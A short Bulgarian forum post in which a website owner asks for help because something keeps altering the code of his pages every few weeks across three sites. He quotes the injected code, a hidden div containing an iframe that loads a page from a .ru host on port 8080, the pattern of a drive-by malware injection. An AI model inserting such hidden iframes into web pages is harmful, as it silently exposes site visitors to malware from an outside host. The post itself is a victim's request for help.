Здравейте ,
от известно време има проблем , значи на 15 дена нещо променя кода на страниците . Първо беше в 1 сайт , после във втори а сега и в трети . Чудно ми е да не е вирус , но компютъра ми е преинсталиран преди 4 дена . Днес отворих страница коята беше засегната и к'во да видя :
Как мога да се справя с тая напаст ? Много ще съм ви благодарен 
от известно време има проблем , значи на 15 дена нещо променя кода на страниците . Първо беше в 1 сайт , после във втори а сега и в трети . Чудно ми е да не е вирус , но компютъра ми е преинсталиран преди 4 дена . Днес отворих страница коята беше засегната и к'во да видя :
Код:
<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=882 height=514 ></iframe></div>